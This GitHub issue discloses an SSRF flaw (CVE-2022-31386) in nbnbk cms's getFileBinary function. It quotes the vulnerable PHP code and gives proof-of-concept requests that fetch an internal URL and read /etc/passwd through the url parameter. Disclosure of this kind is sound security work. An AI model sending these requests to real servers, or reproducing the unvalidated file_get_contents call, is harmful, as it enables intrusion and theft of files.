Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Vuln] SSRF vulnerability in getFileBinary Function #5

Closed
zer0yu opened this issue May 19, 2022 · 2 comments
Closed

[Vuln] SSRF vulnerability in getFileBinary Function #5

zer0yu opened this issue May 19, 2022 · 2 comments

Comments

@zer0yu
Copy link

zer0yu commented May 19, 2022

A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

    /**
     * 文件转Base64二进制流
     * @param $url 网络文件路径,绝对地址
     * @return string
     */
    public function getFileBinary()
    {
        $str = file_get_contents($_REQUEST['url']);
        Util::echo_json(ReturnData::create(ReturnData::SUCCESS,chunk_split(base64_encode($str))));
    }

Vulnerability PoC

GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

image

A remote attacker can also read arbitrary file information from the target system.

PoC

GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close

png1

After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (/etc/passwd)

image

@fgeek
Copy link

fgeek commented Jun 11, 2022

CVE-2022-31386 has been assigned for this vulnerability.

@zer0yu
Copy link
Author

zer0yu commented Jun 16, 2022

thx, bro

@zer0yu zer0yu closed this as completed Jun 16, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants